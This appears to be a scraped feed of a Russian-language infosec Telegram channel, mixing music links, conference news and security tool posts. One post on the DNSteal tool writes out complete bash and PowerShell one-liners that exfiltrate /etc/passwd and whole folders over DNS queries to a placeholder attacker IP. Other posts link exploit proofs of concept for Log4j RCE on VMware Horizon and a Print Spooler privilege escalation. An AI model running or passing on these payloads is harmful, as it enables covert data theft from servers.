Forwarded from APT
Log4jHorizon
A proof of concept for VMWare Horizon instances and allows attackers to execute code as an unauthenticated user using a single HTTP request.
Research:
https://www.sprocketsecurity.com/blog/crossing-the-log4j-horizon-a-vulnerability-with-no-return
Exploit:
https://github.com/puzzlepeaches/Log4jHorizon
#log4j #vmware #horizon #rce
A proof of concept for VMWare Horizon instances and allows attackers to execute code as an unauthenticated user using a single HTTP request.
Research:
https://www.sprocketsecurity.com/blog/crossing-the-log4j-horizon-a-vulnerability-with-no-return
Exploit:
https://github.com/puzzlepeaches/Log4jHorizon
#log4j #vmware #horizon #rce
Ох щас вам олдскулы сведёт так сведёт 😬😝
Не знал что Tenor Fly уже нет вживых…. RIP Legend!
https://www.youtube.com/watch?v=VMOIpdrgnYE
Не знал что Tenor Fly уже нет вживых…. RIP Legend!
https://www.youtube.com/watch?v=VMOIpdrgnYE
YouTube
Freestylers - B Boy Stance
EURODANCE RADIO - http://eurodance90.101.ru.
Ребята из SpectreOps знают всю боль в организации процесса команды Redteam и создали свой продукт - Ghostwriter.
https://www.youtube.com/watch?v=NCkRLGw-TXA
https://www.youtube.com/watch?v=NCkRLGw-TXA
YouTube
Managing Your Red Team Operations with Ghostwriter – Christopher Maddalena (SO-CON 2020)
Whether your team is internal or external, managing a red team assessment's project data and assets only get more challenging as your team matures and grows, and the assessments get bigger. For the past two years, SpecterOps has been developing a red team…
Audio
Разделить трек по аудидорожкам можно с помощью машинного обучения.
Для примера вырезал вокал Tenor Fly из трека B-boy Stance
https://melody.ml/
Для примера вырезал вокал Tenor Fly из трека B-boy Stance
https://melody.ml/
Forwarded from Codeby
ОБЗОР МАТРИЦЫ MITRE DEF3ND
Доброго времени суток. В прошлой статье я рассматривал MITRE ATT&CK, которая показывает техники, используемые злоумышленниками при атаке. Летом 2021 года корпорация MITRE представила свету новую матрицу. Это не обновленная версия ATT&CK, а матрица DEF3ND.
📌 Читать статью: https://codeby.net/threads/obzor-matricy-mitre-def3nd.79304/
📝 Школа Кодебай |🍿Наш ютуб |👾 Наш дискорд
#security #mitre
Доброго времени суток. В прошлой статье я рассматривал MITRE ATT&CK, которая показывает техники, используемые злоумышленниками при атаке. Летом 2021 года корпорация MITRE представила свету новую матрицу. Это не обновленная версия ATT&CK, а матрица DEF3ND.
📌 Читать статью: https://codeby.net/threads/obzor-matricy-mitre-def3nd.79304/
📝 Школа Кодебай |🍿Наш ютуб |👾 Наш дискорд
#security #mitre
Forwarded from ZeroNights
Новости! Определена стилистика ZeroNights 2022
В этом году стилистика ZeroNights отсылает к эпохе залов аркадных автоматов, 8-битным играм и пиксель-арту.
Вашим проводником в мир ИБ станет 11-я версия Матриша, распадающегося на пиксели. Выполненные с использованием пиксельной графики элементы – это громкий ответ любителей ретроигр на преобладание трехмерной графики.
Готовьтесь. Скоро начнем принимать заявки на доклады.
В этом году стилистика ZeroNights отсылает к эпохе залов аркадных автоматов, 8-битным играм и пиксель-арту.
Вашим проводником в мир ИБ станет 11-я версия Матриша, распадающегося на пиксели. Выполненные с использованием пиксельной графики элементы – это громкий ответ любителей ретроигр на преобладание трехмерной графики.
Готовьтесь. Скоро начнем принимать заявки на доклады.
Иногда единственным способом получить данные с сервера является DNS эксфильтрация.
Есть классная тулза DNSteal, которая поднимет тебе фейковый днс сервер и даст тебе готовый payload который нужно будет запустить на сервере (клиенте).
Пример:
На стороне сервера:
На стороне клиента:
Нагрузка для bash для копирования файла /etc/passwd
Нагрузка для bash для копирования папки
Нагрузка для PowerShell для копирования папки:
https://github.com/m57/dnsteal
Есть классная тулза DNSteal, которая поднимет тебе фейковый днс сервер и даст тебе готовый payload который нужно будет запустить на сервере (клиенте).
Пример:
На стороне сервера:
python dnsteal.py YOUR_PUBLIC_IP -v -b 45 -s 2 -f 15
На стороне клиента:
Нагрузка для bash для копирования файла /etc/passwd
# cp /etc/passwd . ;f=passwd; s=2;b=45;c=0; for r in $(for i in $(base64 -w0 $f| sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s" ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @YOUR_PUBLIC_IP `echo -ne $r$f|tr "+" "*"` +short +noidnin; doneНагрузка для bash для копирования папки
# for f in $(ls .); do s=2;b=45;c=0; for r in $(for i in $(base64 -w0 $f | sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s" ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @YOUR_PUBLIC_IP `echo -ne $r$f|tr "+" "*"` +short +noidnin; done ; doneНагрузка для PowerShell для копирования папки:
# $d=«YOUR_PUBLIC_IP»; $s=2; $b=45; Get-ChildItem "." | Foreach-Object {$a=$_.Name; $z = [System.IO.File]::ReadAllBytes($_.FullName); $e = [System.Convert]::ToBase64String($z); $l=$e.Length; $r=""; $n=0; while ($n -le ($l/$b)) { $c=$b; if (($n*$b)+$c -gt $l) { $c=$l-($n*$b) }; $r+=$e.Substring($n*$b, $c) + "-."; if (($n%$s) -eq ($s-1)) { nslookup -type=A $r$a. $d; $r="" } $n=$n+1 } nslookup -type=A $r$a. $d }https://github.com/m57/dnsteal
GitHub
GitHub - m57/dnsteal: DNS Exfiltration tool for stealthily sending files over DNS requests.
DNS Exfiltration tool for stealthily sending files over DNS requests. - m57/dnsteal
SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022–22718)
https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81
PoC: https://github.com/ly4k/SpoolFool
https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81
PoC: https://github.com/ly4k/SpoolFool
Medium
SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999)
In this blog post, we’ll look at a Windows Print Spooler local privilege escalation vulnerability that I found and…
Forwarded from Sys-Admin InfoSec
BLD DNS - Обновление в сторону скорости и безопасности. Краткий отчет.
Уже почти, как полгода открытый превентивный DoT/DoH BLD DNS сервис бесплатно приносит пользу блокируя малварные, фишинговые, трекинговые и рекламные домены, экономя трафик, время и мозговые ресурсы своим пользователям.
За это время были заблокировано множество фишинговых кампаний (типа franken-phish), малварных и рамсомварных компаний (типа Pegasus или Kaseya), про блокировку рекламных и трекинговых доменов говорить наверное и не стоит, можно лишь упомянуть, что их количество превышет 1 миллион поинтов из текущих ~двух.
⚡️ В обшей сложности блокируется ~9%-15% процентов вредоносности из ~10 миллионов запросов в месяц из разных стран мира, это очень радует спасибо всем кто пользуется и привносит вклад в проект .
Что добавилось в этом году:
• новый регион, теперь регионов 4 - Казахстан, Германия, Сингапур, Нидерлады
• несколько сетов по вендорам для нивелирования false-positive срабатываний
• добавлен дуплексный режим DoH (443, 8443)
• надеюсь скоро добавится конструктор сетов блокировок BLD DNS (анонс)
Со своей стороны хочется сделать открытый сервис еще более открытым, доступным, надежным, напомню, что сервис живет благодаря помощи друзей, пользователей, тестировщиков проекта, здесь будет полезна и твоя помощь уважаемый user_name твой вклад, как умственный или временной или финансовый будет неоценим, а твой user_name будет отражен в разделе благодарностей на официальном сайте BLD DNS - https://lab.sys-adm.in 🙂
P.S. Спасибо друзьям из Nitro Team за ряд идей по безопасности проекта.
Всем успехов и добра, с уважением @sysadminkz. Берегите себя. Pace to all ✌️
Forwarded from Mikrotik Ninja
Когда нужно составить сложный запрос в Python Requests на помощь приходит CurlConverter
Кстати, конвертирует он не только для Python. В списке есть также ansible, go, java, node.js, rust и другие
Кстати, конвертирует он не только для Python. В списке есть также ansible, go, java, node.js, rust и другие
Curlconverter
Convert curl commands to code
Utility for converting cURL commands to code